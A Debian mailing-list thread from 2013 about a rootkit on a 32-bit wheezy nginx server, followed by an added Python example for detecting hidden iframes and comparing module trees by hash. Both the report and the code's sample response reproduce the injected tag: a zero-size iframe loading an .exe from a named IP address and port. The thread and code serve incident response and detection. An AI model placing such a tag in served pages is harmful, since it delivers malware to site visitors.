
Re: debian wheezy i386 nginx iframe rootkit



On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
> Last fall there was a debian 64-bit / nginx rootkit going around,
> now I've been hit with what sounds similar but on 32-bit wheezy.
>
> Here's a link to info on the previous 64-bit rootkit:
> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>
>
> All files served by nginx have this line inserted at the top:
>
> <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
>
> Whatever it was isn't there anymore:
>  Connecting to 122.226.137.123:1111... failed: Connection refused.
>
> I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
> difference.
>
> No insmod line in /etc/rc.local
>
> I haven't been able to find anything.  Googling doesn't show anything
> similar for debian wheezy i386, only squeeze 64-bit.
>
> I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
> the nginx-light from debian wheezy but it made no difference.
>
> This machine was built on July 19th.  I've uninstalled nginx. I'll hold
> off rebuilding for now, maybe somebody here has some ideas?
>
>    E Frank Ball          frankb@efball.com

Just out of curiosity, did you back up nginx and check it as well?


--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.
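Two checks a defender can script for the symptoms described in this thread, written as an added example and not code from either poster. The first flags the kind of injected tag Frank saw (an invisible iframe, or one that loads a Windows executable) in content the web server returns. The second does what his `diff -r` of /lib/modules/<kernel>/kernel against a clean machine did, but by content hash, so it also catches a binary that was replaced with one of the same name (which is what Joel's question about nginx is getting at). The sample response, the file names under the demo trees (`net/ipv4.ko`, `hidden.ko`) and the helper names are all constructed for the example; the first sample line reproduces the tag quoted in the report.

```python
"""Added example (not from the thread): detect hidden/executable-loading iframes in
served content, and compare a suspect directory tree against a clean copy by hash."""
import hashlib
import os
import re
import tempfile

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Tolerates the unquoted, space-separated form seen in the report: src= http://...
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?\s*([^\s"'>]+)""", re.IGNORECASE)


def _attr_is_zero(tag, name):
    """True if the tag carries name=0, name="0" or name='0'."""
    pattern = r"\b" + re.escape(name) + r"""\s*=\s*["']?0\b"""
    return re.search(pattern, tag, re.IGNORECASE) is not None


def find_suspicious_iframes(body):
    """Return the src URLs of iframes that are invisible (width=0 and height=0)
    or that point at a .exe; either is a strong signal of injected content."""
    hits = []
    for m in IFRAME_TAG.finditer(body):
        tag = m.group(0)
        src = SRC_ATTR.search(tag)
        if not src:
            continue
        url = src.group(1)
        invisible = _attr_is_zero(tag, "width") and _attr_is_zero(tag, "height")
        if invisible or url.lower().endswith(".exe"):
            hits.append(url)
    return hits


def hash_tree(root):
    """Map each regular file under root (path relative to root) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root)] = h.hexdigest()
    return digests


def compare_trees(clean_root, suspect_root):
    """Like `diff -r`, but by content hash: files only in the suspect tree (a dropped
    module), files missing from it, and files whose bytes changed (a patched binary)."""
    clean = hash_tree(clean_root)
    suspect = hash_tree(suspect_root)
    return {
        "added": sorted(set(suspect) - set(clean)),
        "missing": sorted(set(clean) - set(suspect)),
        "modified": sorted(p for p in clean if p in suspect and clean[p] != suspect[p]),
    }


def make_demo_trees():
    """Constructed demo: a clean tree and a tampered copy of it with one modified
    file and one extra dropped-in file. Returns (clean_root, suspect_root)."""
    base = tempfile.mkdtemp(prefix="tree-diff-demo-")
    clean = os.path.join(base, "clean")
    suspect = os.path.join(base, "suspect")
    for root in (clean, suspect):
        os.makedirs(os.path.join(root, "net"))
        with open(os.path.join(root, "net", "ipv4.ko"), "wb") as f:
            f.write(b"constructed module contents")
    with open(os.path.join(suspect, "net", "ipv4.ko"), "ab") as f:
        f.write(b" + patched")            # same name, different bytes
    with open(os.path.join(suspect, "hidden.ko"), "wb") as f:
        f.write(b"constructed dropped module")
    return clean, suspect


# Constructed sample response: line 1 is the injected tag quoted in the report,
# line 2 is an ordinary visible embed that must not be flagged.
SAMPLE_RESPONSE = (
    "<iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>\n"
    '<html><body><iframe src="https://example.org/embed" width=300 height=200>'
    "</iframe></body></html>\n"
)

if __name__ == "__main__":
    print("suspicious iframes:", find_suspicious_iframes(SAMPLE_RESPONSE))
    clean_dir, suspect_dir = make_demo_trees()
    print("tree differences:", compare_trees(clean_dir, suspect_dir))
```

In practice the first check is run over responses fetched from the suspect server (and compared with the file on disk, since the report describes the line being added at serve time), and the second over a tarball of the suspect /lib/modules tree and the nginx package files against a freshly installed host, which is the comparison the original post performed by hand.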

